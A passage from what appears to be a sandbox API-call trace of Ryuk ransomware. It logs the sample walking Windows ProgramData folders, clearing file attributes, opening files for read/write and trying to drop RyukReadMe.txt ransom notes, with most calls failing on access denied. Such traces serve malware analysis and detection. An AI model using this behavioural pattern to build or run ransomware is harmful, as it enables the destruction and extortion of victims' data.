stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.568] GetLastError () returned 0x5 [0140.568] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.568] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.568] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.568] SetLastError (dwErrCode=0x0) [0140.568] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.568] GetLastError () returned 0x5 [0140.568] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.568] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.568] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0140.569] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.569] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.569] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.569] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png", dwFileAttributes=0x80) returned 0 [0140.569] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.569] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.569] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.569] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.569] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.569] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml", dwFileAttributes=0x80) returned 0 [0140.570] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.570] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.570] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.570] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.570] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.570] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png", dwFileAttributes=0x80) returned 0 [0140.570] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.570] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.570] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.570] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0140.570] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0140.571] SetLastError (dwErrCode=0x0) [0140.571] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.571] GetLastError () returned 0x5 [0140.571] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.571] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.571] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0140.571] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0140.571] SetLastError (dwErrCode=0x0) [0140.571] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.571] GetLastError () returned 0x5 [0140.571] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.571] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.571] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.571] SetLastError (dwErrCode=0x0) [0140.571] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.571] GetLastError () returned 0x5 [0140.571] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.571] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.571] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0140.572] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.572] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.572] SetLastError (dwErrCode=0x0) [0140.572] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.572] GetLastError () returned 0x5 [0140.572] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.572] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.572] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0140.574] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.574] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.574] SetLastError (dwErrCode=0x0) [0140.574] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.574] GetLastError () returned 0x5 [0140.574] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0140.574] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.574] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0140.574] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0140.574] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0140.574] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.574] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml", dwFileAttributes=0x80) returned 0 [0140.575] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.575] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.575] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.575] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0140.575] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0140.575] SetLastError (dwErrCode=0x0) [0140.575] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.575] GetLastError () returned 0x5 [0140.575] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0140.575] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.575] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.576] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.576] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico", dwFileAttributes=0x80) returned 0 [0140.576] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.576] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.576] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.576] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.576] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.576] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico", dwFileAttributes=0x80) returned 0 [0140.576] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.576] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.577] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.577] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.577] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.577] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico", dwFileAttributes=0x80) returned 0 [0140.577] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.577] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.577] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.577] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.577] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.577] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml", dwFileAttributes=0x80) returned 0 [0140.578] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.578] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.578] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.578] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.578] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.579] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico", dwFileAttributes=0x80) returned 0 [0140.579] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.579] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.579] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.579] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.579] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.579] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico", dwFileAttributes=0x80) returned 0 [0140.579] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.579] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.579] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.579] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.579] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.580] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico", dwFileAttributes=0x80) returned 0 [0140.580] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.580] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.580] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.580] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.580] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.580] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml", dwFileAttributes=0x80) returned 0 [0140.581] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.581] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.581] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.581] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.581] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.581] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico", dwFileAttributes=0x80) returned 0 [0140.581] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.582] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.582] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.582] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0140.582] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0140.582] SetLastError (dwErrCode=0x0) [0140.582] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.582] GetLastError () returned 0x5 [0140.582] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.582] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.582] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.582] SetLastError (dwErrCode=0x0) [0140.582] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.582] GetLastError () returned 0x5 [0140.582] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.582] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.582] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0140.588] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.588] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.588] SetLastError (dwErrCode=0x0) [0140.588] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.588] GetLastError () returned 0x5 [0140.588] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0140.588] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.588] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0140.589] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0140.589] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0140.589] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.589] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml", dwFileAttributes=0x80) returned 0 [0140.589] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.589] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.589] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.590] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0140.590] FindClose 